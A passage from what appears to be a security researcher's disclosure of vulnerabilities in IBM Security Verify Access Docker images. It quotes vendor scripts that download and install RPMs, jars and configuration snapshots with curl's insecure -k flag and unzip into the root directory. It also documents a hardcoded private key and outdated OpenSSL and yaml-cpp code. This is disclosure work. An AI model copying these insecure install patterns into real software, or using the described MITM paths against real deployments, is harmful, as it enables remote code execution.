postgresql-12 postgresql-server-12 postgresql-jdbc-42; do\n85     rpm_file=`grep $pkg $rpms | tail -n 1 | \\\n86                     sed \u0027s|.*href=\"||g\u0027 | cut -f 1 -d \u0027\"\u0027`\n87 \n88     echo \"Installing: $rpm_file\"\n89 \n90     rpm -i --nodeps $centos_base/$rpm_file\n91 done\n92 \n93 rm -f $rpms\n94 \n95 #\n96 # Need a more current jar then what is part of the postges-jdbc rpm\n97 #\n98 postgres_jar=`locate_file postgresql-.*.jar`\n99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar\n[/code]\n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform. \n\nNote that IBM does not consider this vulnerability since the script is supposed to be executed in a secure network. \n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-runtime:\n\n[code:shell]\n239 #\n240 # Ensure that the reload script is executable. \n241 #\n242 \n243 mv /sbin/reload.sh /sbin/runtime_reload\n244 \n245 chmod 755 /sbin/runtime_reload\n[/code]\n\nAnalysis of `/sbin/runtime_reload`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nWe can also see that Postgres does not have passwords in line 144, already found in [Lack of authentication in Postgres inside verify-access-runtime](#no-auth-postgres). \n\n\n\n[code:shell]\n 67 #############################################################################\n 68 # Attempt to download the snapshot from the configuration service. \n 69 \n 70 download_from_cfgsvc()\n 71 {\n 72     # No need to download the snapshot if the configuration service has not\n 73     # been defined. \n 74     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 75         return\n 76     fi\n 77 \n 78     if [ $1 -eq 1 ] ; then\n 79         Echo 960\n 80     fi\n 81 \n 82     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n 83             \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n 84             -o $snapshot\n 85 \n 86     if [ $? -ne 0 ] ; then\n 87         if [ $1 -eq 1 ] ; then\n 88             Echo 961\n 89         fi\n 90 \n 91         rm -f $snapshot\n 92     else\n 93         Echo 962\n 94     fi\n 95 }\n[...]\n 97 #############################################################################\n 98 # Main line. \n 99 \n100 #\n101 # Download the snapshot file. \n102 #\n103 \n104 download_from_cfgsvc 1\n[...]\n127 #\n128 # Update the configuration database. \n129 #\n130 \n131 Echo 997\n132 \n133 db_root=/var/postgresql/config\n134 db_snapshot=$db_root/snapshot.sql\n135 db_port=5432\n136 db_name=config\n137 db_user=www-data\n138 \n139 if [ ! -f $db_snapshot ] ; then\n140     Echo 975\n141     exit 1\n142 fi\n143 \n144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w\n\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-wrp\n\nIt was observed that the Docker image verify-access-wrp uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. He can also overwrite any file present in the verify-access-wrp docker instance (getting a Remote Code Execution). \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-wrp:\n\n[code:shell]\n210 #\n211 # Ensure that the restart script is executable. \n212 #\n213 \n214 mv /sbin/restart.sh /sbin/wrprestart\n215 \n216 chmod 755 /sbin/wrprestart\n[/code]\n\nAnalysis of `/sbin/wrprestart`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nThe `openldap.zip` file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the `/` directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious `slapd.conf` file (stored inside `openldap.zip`, in `etc/openldap/slapd.conf`). \n\nSince the extraction of `openldap.zip` takes place in `/`, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program). \n\n[code:shell]\n 85 #############################################################################\n 86 # Attempt to download the snapshot from the configuration service. \n 87 \n 88 download_from_cfgsvc()\n 89 {\n 90     # No need to download the snapshot if the configuration service has not\n 91     # been defined. \n 92     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 93         return\n 94     fi\n 95 \n 96     if [ $1 -eq 1 ] ; then\n 97         Echo 960\n 98     fi\n 99 \n100     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n101             \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n102             -o $snapshot\n103 \n104     if [ $? -ne 0 ] ; then                                                                                                                                                                      \n105         if [ $1 -eq 1 ] ; then                                                                                                                                                                  \n106             Echo 961                                                                                                                                                                            \n107         fi\n108 \n109         rm -f $snapshot\n110     else\n111         Echo 962\n112     fi\n113 }\n[...]\n137 #############################################################################\n138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. \n139 \n140 restart_openldap_server()\n141 {\n142     # Check to see whether the embedded LDAP server has been enabled or\n143     # not. \n144     ldap_conf=\"/var/PolicyDirector/etc/ldap.conf\"\n145     ldap_host=`$pdconf -f $ldap_conf getentry ldap host`\n146 \n147     if [ \"$ldap_host\" != \"127.0.0.1\" ] ; then\n148         return\n149     fi\n150 \n151     Echo 964\n152 \n153     # Decrypt and extract the LDAP configuration. \n154     isva_decrypt $snapshot_tmp_dir/openldap.zip\n155 \n156     unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n157 \n158     # Change the LDAP port from 389 to 6389 (389 is a privileged port). \n159     $pdconf -f $ldap_conf setentry ldap port 6389\n160 \n161     # Stop the LDAP server. \n162     busybox killall -SIGHUP slapd\n163 \n164     while $(busybox killall -0 slapd 2\u003e/dev/null); do\n165         sleep 1\n166     done\n167 \n168     # Start the LDAP server. \n169     slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n170 }\n[...]\n260 #############################################################################\n261 # Main line. \n262 \n263 #\n264 # Attempt to download the configuration data from the configuration service. \n265 #\n266 \n267 #\n268 # Wait for the snapshot file. \n269 #\n270 \n271 download_from_cfgsvc 1\n[...]\n305 #\n306 # Restart the OpenLDAP server. \n307 #\n308 \n309 restart_openldap_server\n[/code]\n\n\n\n## Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n\nIt was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:\n\n    kali-docker# pwd \n    /home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum\n    \n    kali-docker# ls -al \n    total 492 \n    drwxr-xr-x  2 root root   4096 Jun  8 01:43 . \n    drwxr-xr-x 25 root root   4096 Jun  8 04:09 .. \n    -rwxr-xr-x  1 root root   1296 Oct 20  2016 externalTrustSettings.xml\n    -rwxr-xr-x  1 root root 445080 Oct 20  2016 iss-external.kdb\n    -rwxr-xr-x  1 root root    129 Oct 20  2016 iss-external.sth\n    -rwxr-xr-x  1 root root    100 Oct 20  2016 iss-lum.conf\n    -rwxr-xr-x  1 root root   3649 Oct 20  2016 isslum-usLocalSettings.xml\n    -rwxr-xr-x  1 root root    725 Oct 20  2016 lum_triggers.conf\n    -rwxr-xr-x  1 root root   1858 Oct 20  2016 private.pem\n    -rwxr-xr-x  1 root root    451 Oct 20  2016 public.pem\n    -rwxr-xr-x  1 root root   3926 Oct 20  2016 .udrc\n    -rwxr-xr-x  1 root root    806 Oct 20  2016 update-settings.conf\n    -rwxr-xr-x  1 root root   7352 Oct 20  2016 update-status.xsd\n    -rwxr-xr-x  1 root root    561 Jun  8 01:32 UpdateTypeNames.config\n    -rwxr-xr-x  1 root root      0 Dec 31  1969 .wh..wh..opq\n\n    kali-docker# sha256sum private.pem public.pem\n    e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem\n    3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem\n\nWhen analyzing the podman instance verify-access, we can confirm the key has not been updated:\n\n    [isam@verify-access lum]$ sha256sum private.pem  public.pem\n    e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem\n    3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem\n    [isam@verify-access lum]$\n\nThe private key appears to be used by several programs:\n\n- - /opt/dca/bin/dcatool\n- - /usr/bin/isslum-modstatus\n- - /usr/sbin/iss-lum\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_eventsd\n- - /usr/sbin/isslum-installer\n\n\nThe license client is using outdated codes and may contain vulnerabilities. \n\nThe keys are hardcoded and have not been updated for 6 years, which brings a question how the license client is being maintained. \n\n\n\n## Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n\nIt was observed that the `dcatool` program located in `/opt/dca/bin` is linked with an outdated OpenSSL library located in the non-standard directory `/opt/dca/lib`:\n\n- From a live system:\n\n    [isam@verify-access bin]$ pwd\n    /opt/dca/bin\n    [isam@verify-access bin]$ ls -la\n    total 580\n    drwxr-xr-x 2 root root   4096 Jun  8 13:43 . \n    drwxr-xr-x 4 root root   4096 Jun  8 13:43 .. \n    -rwxr-xr-x 1 root root 373208 Jun  8 13:31 dcatool\n    -rwxr-xr-x 1 root root 207872 Jun  8 13:31 dcaupdate\n    [isam@verify-access bin]$ ldd dcatool  | grep ssl\n            libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000)\n            libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fafcda45000)\n    [isam@verify-access bin]$ ldd dcaupdate  | grep ssl\n            libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fe04980d000)\n            libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fe047734000)\n\nAnalysis of the library:\n\n    [isam@verify-access lib]$ pwd\n    /opt/dca/lib\n    [isam@verify-access lib]$ ls -la\n    total 4156\n    drwxr-xr-x 2 root root    4096 Jun  8 13:43 . \n    drwxr-xr-x 4 root root    4096 Jun  8 13:43 .. \n    -rwxr-xr-x 1 root root 1252080 Jun  8 13:31 libboost_regex.so.1.53.0\n    -rwxr-xr-x 1 root root 2521496 Jun  8 13:31 libcrypto.so.10\n    lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicudata.so.54 -\u003e /usr/lib64/libicudata.so\n    lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicui18n.so.54 -\u003e /usr/lib64/libicui18n.so\n    lrwxrwxrwx 1 root root      22 Jun  8 13:43 libicuuc.so.54 -\u003e /usr/lib64/libicuuc.so\n    -rwxr-xr-x 1 root root  470328 Jun  8 13:31 libssl.so.10\n    [isam@verify-access lib]$ sha256sum *so*\n    a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9  libboost_regex.so.1.53.0\n    8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  libcrypto.so.10\n    07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac  libicudata.so.54\n    49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe  libicui18n.so.54\n    1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972  libicuuc.so.54\n    523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  libssl.so.10\n    [isam@verify-access lib]$\n\nWe can retrieve these 2 libraries inside the `ibmcom/verify-access` image and identify the version of OpenSSL:\n\n    kali-docker# sha256sum **/libssl.so.10                                                                                                \n    523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10\n    kali-docker# sha256sum **/libcrypto.so.10                                                                                             \n    8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10\n    \n    kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl\n    [...][\n    OpenSSL 1.0.2k-fips  26 Jan 2017\n    [...]\n    kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl\n    OpenSSL 1.0.2k-fips  26 Jan 2017\n    [...]\n\nThe libraries located in `/opt/dca/lib` are completely outdated and are vulnerable to known CVEs. \n\nThese libraries are likely used by IBM-specific programs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n\nIt was observed that the `/usr/sbin/iss-lum` program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers. \n\nThis program runs inside the instance:\n\n    [isam@verify-access /]$ ps -auxw\n    USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n    isam           1  0.0  0.0  12060   132 ?        Ss   Oct04   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         313  0.0  0.0  24532    68 ?        Ss   Oct04   0:00 /usr/sbin/mesa_crashd\n    isam         315  0.1  0.0  24532  1032 ?        S    Oct04   1:57 /usr/sbin/mesa_crashd\n    isam         319  0.0  0.0  69160   144 ?        Ss   Oct04   0:00 /usr/sbin/mesa_syslogd\n    isam         321  0.0  0.0  69224  1280 ?        S    Oct04   0:00 /usr/sbin/mesa_syslogd\n    isam         400  0.0  0.0 102760   200 ?        Ss   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         401  0.0  0.0 710856   316 ?        Sl   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000\n    pgresql      435  0.0  0.0 188380  7016 ?        Ss   Oct04   0:02 /usr/bin/postgres -D /var/postgresql/config/data\n    pgresql      436  0.0  0.0 138892   184 ?        Ss   Oct04   0:00 postgres: logger   \n    pgresql      447  0.0  0.0 188380  1600 ?        Ss   Oct04   0:00 postgres: checkpointer   \n    pgresql      448  0.0  0.0 188516  1288 ?        Ss   Oct04   0:01 postgres: background writer   \n    pgresql      449  0.0  0.0 188380  1468 ?        Ss   Oct04   0:01 postgres: walwriter   \n    pgresql      450  0.0  0.0 189112  1864 ?        Ss   Oct04   0:01 postgres: autovacuum launcher   \n    pgresql      451  0.0  0.0 139024   588 ?        Ss   Oct04   0:05 postgres: stats collector   \n    pgresql      452  0.0  0.0 188916  1016 ?        Ss   Oct04   0:00 postgres: logical replication launcher   \n    www-data     548  0.4  4.8 4920352 387128 ?      SLl  Oct04   7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean\n    isam         748  0.0  0.0 270992     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    ldap         753  0.0  4.3 1314228 346548 ?      Sl   Oct04   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    isam         757  0.0  0.0 271124     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n    ivmgr        762  0.0  0.1 1070184 10860 ?       Sl   Oct04   0:01 /opt/PolicyDirector/bin/pdmgrd -foreground\n    isam         805  0.0  0.0  71488   316 ?        Ss   Oct04   0:00 /usr/sbin/iss-lum\n    isam         806  0.0  0.0 343920  5264 ?        Sl   Oct04   0:00 /usr/sbin/iss-lum\n    root         811  0.0  0.0  41984  2416 ?        Ss   Oct04   0:00 /usr/sbin/crond\n    isam         834  0.0  0.0 128400  2076 ?        Ssl  Oct04   0:00 /usr/sbin/rsyslogd\n    root         859  0.0  0.0 174348    96 ?        Ss   Oct04   0:00 /usr/sbin/wga_servertaskd\n    ivmgr        861  0.0  0.0 276544    84 ?        Sl   Oct04   0:00 /usr/sbin/wga_servertaskd\n    isam         870  0.0  0.0 273920     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n    isam         877  2.1  0.2 563872 18472 ?        Sl   Oct04  38:43 wga_notifications -foreground\n    isam         889  0.0  0.0  12060    80 ?        S    Oct04   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         892  0.0  0.0  23068    24 ?        S    Oct04   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n    isam      217541  4.0  0.0  19248  3836 pts/0    Ss   21:37   0:00 bash\n    isam      217564  0.0  0.0  54808  4080 pts/0    R+   21:37   0:00 ps -auxww\n    [isam@verify-access /]$ \n\nThis program appears to establish connections to remote servers to check the license. \n\nThe OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, this program includes several hardcoded keys to decrypt the private key in `/etc/lum/private.pem`. In the function ctor_009:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nSome decryption keys have been identified within the binaries used to check the license:\n\nFunction `sub_4806C0`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFunction `ctor_009`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Outdated \"IBM Crypto for C\" library\n\nIt was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory `/usr/local/ibm/gsk8_64`:\n\nFor example, from the Docker image verify-access-wrp:\n\n    kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a \n    kali-docker# find usr/local/ibm       \n    usr/local/ibm\n    usr/local/ibm/gsk8_64\n    usr/local/ibm/gsk8_64/lib64\n    usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so\n    usr/local/ibm/gsk8_64/lib64/C\n    usr/local/ibm/gsk8_64/lib64/C/icc\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt\n    usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so\n    usr/local/ibm/gsk8_64/lib64/N\n    usr/local/ibm/gsk8_64/lib64/N/icc\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt\n    usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt\n    usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so\n    usr/local/ibm/gsk8_64/docs\n    usr/local/ibm/gsk8_64/copyright\n    usr/local/ibm/gsk8_64/inc\n    usr/local/ibm/gsk8_64/bin\n    usr/local/ibm/gsk8_64/bin/gsk8capicmd_64\n    usr/local/ibm/gsk8_64/bin/gsk8ver_64\n    usr/local/ibm/.wh..wh..opq\n    kali-docker#\n\nThis library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, the copyrights from the `/usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt` file indicate:\n\n- - (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib\n- - Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved. - for OpenSSL\n\nThe `/usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt` file confirms the libraries were generated 2 years ago:\n\n    #\n    # IBM Crypto for C. \n    # ICC Version 8.7.37.0\n    #\n    # Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),\n    # zlib (www.zlib.org)\n    # and IBM code (www.ibm.com)\n    #\n    # Platform AMD64_LINUX\n    #\n    # Generated Tue Oct 13 12:09:08 2020\n    #\n    # File name=libicclib085.so\n    # File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f\n    #\n    FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad\n    #\n    SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f\n    #\n    #Do not edit before this line\n    #\n    # Global Settings\n    ICC_ALLOW_2KEY3DES=1\n\nThe OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Webseald using outdated code with remotely exploitable vulnerabilities\n\nIt was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. \nThis program can be found inside these 2 images:\n\n- - verify-access\n- - verify-access-wrp\n\nWebseald is reachable over the network. \n\nLibraries used by webseald:\n\n    kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald\n            linux-vdso.so.1 (0x00007fffe59f3000)\n            libwsdaemon.so =\u003e not found\n            libamwoauth.so =\u003e not found\n            libamweb.so =\u003e not found\n            libamwebrte.so =\u003e not found\n            libpdsvcutl.so =\u003e not found\n            libtivsec_msg.so =\u003e not found\n            libpdz.so =\u003e not found\n            libdl.so.2 =\u003e /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)\n            libtivsec_xslt4c.so.112 =\u003e not found\n            libtivsec_xml4c.so =\u003e not found\n            libtivsec_yamlcpp.so =\u003e not found\n            libam_gssapi_krb5.so =\u003e not found\n            libmodsecurity.so.3 =\u003e not found\n            libamwredismgr.so =\u003e not found\n            libhiredis.so.0.15 =\u003e not found\n            libhiredis_ssl.so.0.15 =\u003e not found\n            libpthread.so.0 =\u003e /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)\n            libstdc++.so.6 =\u003e /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)\n            libm.so.6 =\u003e /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)\n            libgcc_s.so.1 =\u003e /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)\n            libc.so.6 =\u003e /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)\n            /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)\n\nThe IBM-specific libraries (*.so*) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities. \n\nWebseal is directly reachable from the network but uses the outdated and vulnerable code. \n\nThe quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards. \n\nDue to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries. \n\n\n\n### Libmodsecurity.so - 1 non-assigned CVE vulnerability\n\nThe `/opt/pdweb/lib/libmodsecurity.so.3` library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE). \n\nThis version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124. \n\n\n\n### libtivsec_yamlcpp.so - 4 CVEs\n\nThis IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp. \n\nSeveral vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library. \n\nThis IBM-specific library is located at `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so` (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90). \n\nWhen doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository. \n\nWe can identify several methods from the yaml-cpp library. For example, the method `SingleDocParser::HandleFlowMap()` found in `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWhen analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and 